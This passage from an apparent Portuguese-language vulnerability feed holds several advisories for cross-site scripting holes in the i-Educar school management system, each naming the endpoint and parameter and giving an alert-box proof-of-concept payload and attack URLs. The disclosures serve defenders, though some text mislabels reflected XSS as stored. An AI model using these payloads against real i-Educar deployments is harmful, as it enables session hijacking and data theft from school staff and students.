class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8368" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8368</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>pesquisa_pessoa_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>campo_busca</code> e <code>cpf</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>pesquisa_pessoa_lst.php</code></p> <p>Parâmetros: <code>campo_busca</code> e <code>cpf</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>campo_busca</code> e <code>cpf</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8368-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-pesquisa_pessoa_lstphp">CVE-2025-8368: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>pesquisa_pessoa_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8368" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8368</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>pesquisa_pessoa_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>campo_busca</code> e <code>cpf</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>pesquisa_pessoa_lst.php</code></p> <p>Parâmetros: <code>campo_busca</code> e <code>cpf</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>campo_busca</code> e <code>cpf</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">Ealert</span><span class="o">%</span><span class="mi">28</span><span class="o">%</span><span class="mi">27</span><span class="nx">XSS</span><span class="o">-</span><span class="nx">PoC</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="nx">C</span><span class="o">%</span><span class="mi">2</span><span class="nx">Fscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8368/image.png" width="1527" height="499" srcset="/p/cve-2025-8368/image_hu_ed5558ad0fc1df7d.png 480w, /p/cve-2025-8368/image_hu_9f69f1446734701d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="306" data-flex-basis="734px" /></p> <p style="text-align: justify;">Esse payload pode ser injetado em qualquer um dos dois parâmetros. Exemplos de URLs de ataque:</p> <h4 id="parâmetro-campo_busca">Parâmetro <code>campo_busca</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/pesquisa_pessoa_lst.php?campo_busca=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><h4 id="parâmetro-cpf">Parâmetro <code>cpf</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/pesquisa_pessoa_lst.php?cpf=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8369/ https://www.cvehunters.com/pt/p/cve-2025-8369/ <h2 id="cve-2025-8369-cross-site-scripting-xss-refletido-no-endpoint-educar_avaliacao_desempenho_lstphp-parâmetro-titulo_avaliacao">CVE-2025-8369: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_avaliacao_desempenho_lst.php</code> parâmetro <code>titulo_avaliacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8369" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8369</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_avaliacao_desempenho_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>titulo_avaliacao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_avaliacao_desempenho_lst.php</code></p> <p>Parâmetro: <code>titulo_avaliacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>titulo_avaliacao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8369-cross-site-scripting-xss-refletido-no-endpoint-educar_avaliacao_desempenho_lstphp-parâmetro-titulo_avaliacao">CVE-2025-8369: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_avaliacao_desempenho_lst.php</code> parâmetro <code>titulo_avaliacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8369" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8369</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_avaliacao_desempenho_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>titulo_avaliacao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_avaliacao_desempenho_lst.php</code></p> <p>Parâmetro: <code>titulo_avaliacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>titulo_avaliacao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><h4 id="codificado">Codificado </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">Ealert</span><span class="o">%</span><span class="mi">28</span><span class="o">%</span><span class="mi">27</span><span class="nx">XSS</span><span class="o">-</span><span class="nx">PoC</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="nx">C</span><span class="o">%</span><span class="mi">2</span><span class="nx">Fscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="decodificado">Decodificado </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8369/image.png" width="724" height="774" srcset="/p/cve-2025-8369/image_hu_f2d2374689b068fc.png 480w, /p/cve-2025-8369/image_hu_e432fb0e1e210761.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="93" data-flex-basis="224px" /></p> <h3 id="url">URL </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Quando um usuário acessa essa URL criada, o script é executado imediatamente no navegador, confirmando a vulnerabilidade.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8370/ https://www.cvehunters.com/pt/p/cve-2025-8370/ <h2 id="cve-2025-8370-cross-site-scripting-xss-refletido-no-endpoint-educar_escolaridade_lstphp-parâmetro-descricao">CVE-2025-8370: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_escolaridade_lst.php</code> parâmetro <code>descricao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8370" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8370</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_escolaridade_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>descricao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_escolaridade_lst.php</code></p> <p>Parâmetro: <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8370-cross-site-scripting-xss-refletido-no-endpoint-educar_escolaridade_lstphp-parâmetro-descricao">CVE-2025-8370: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_escolaridade_lst.php</code> parâmetro <code>descricao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8370" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8370</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_escolaridade_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>descricao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_escolaridade_lst.php</code></p> <p>Parâmetro: <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8370/image.png" width="877" height="800" srcset="/p/cve-2025-8370/image_hu_5f218bc04c4efbce.png 480w, /p/cve-2025-8370/image_hu_61d9d458bc662e2e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="109" data-flex-basis="263px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7866/ https://www.cvehunters.com/pt/p/cve-2025-7866/ <h2 id="cve-2025-7866-cross-site-scripting-xss-armazenado-no-endpoint-educar_deficiencia_lstphp-parâmetro-cod_deficiencia">CVE-2025-7866: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_deficiencia_lst.php</code> parâmetro <code>cod_deficiencia</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7866" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7866</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_deficiencia_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cod_deficiencia</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_deficiencia_lst.php</code></p><h2 id="cve-2025-7866-cross-site-scripting-xss-armazenado-no-endpoint-educar_deficiencia_lstphp-parâmetro-cod_deficiencia">CVE-2025-7866: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_deficiencia_lst.php</code> parâmetro <code>cod_deficiencia</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7866" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7866</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_deficiencia_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cod_deficiencia</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_deficiencia_lst.php</code></p> <p>Parâmetro: <code>cod_deficiencia</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cod_deficiencia</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7866/image.png" width="1905" height="1110" srcset="/p/cve-2025-7866/image_hu_646e3b277d6607bd.png 480w, /p/cve-2025-7866/image_hu_d58317a6e86cd50.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="171" data-flex-basis="411px" /></p> <p><img src="/p/cve-2025-7866/image-1.png" width="1859" height="1070" srcset="/p/cve-2025-7866/image-1_hu_88404b61f892a24.png 480w, /p/cve-2025-7866/image-1_hu_8ce0f4ae80111656.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="173" data-flex-basis="416px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/2N25n832O88" target="_blank" rel="noopener" >https://youtu.be/2N25n832O88</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7867/ https://www.cvehunters.com/pt/p/cve-2025-7867/ <h2 id="cve-2025-7867-cross-site-scripting-xss-armazenado-no-endpoint-agendaphp-parâmetro-agenda_rap_titulo">CVE-2025-7867: Cross-Site Scripting (XSS) Armazenado no endpoint <code>agenda.php</code> parâmetro <code>agenda_rap_titulo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7867" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7867</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>agenda.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>agenda_rap_titulo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>agenda.php</code></p><h2 id="cve-2025-7867-cross-site-scripting-xss-armazenado-no-endpoint-agendaphp-parâmetro-agenda_rap_titulo">CVE-2025-7867: Cross-Site Scripting (XSS) Armazenado no endpoint <code>agenda.php</code> parâmetro <code>agenda_rap_titulo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7867" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7867</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>agenda.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>agenda_rap_titulo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>agenda.php</code></p> <p>Parâmetro: <code>agenda_rap_titulo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>agenda_rap_titulo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar PaCXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7867/image.png" width="1901" height="986" srcset="/p/cve-2025-7867/image_hu_9177192a4933535d.png 480w, /p/cve-2025-7867/image_hu_1214bd40f85ed40c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-7867/image-1.png" width="1896" height="898" srcset="/p/cve-2025-7867/image-1_hu_bad03e95b8b5cbe1.png 480w, /p/cve-2025-7867/image-1_hu_639a842d81b9b092.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="506px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/dOwcn_k2iTE" target="_blank" rel="noopener" >https://youtu.be/dOwcn_k2iTE</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7868/ https://www.cvehunters.com/pt/p/cve-2025-7868/ <h2 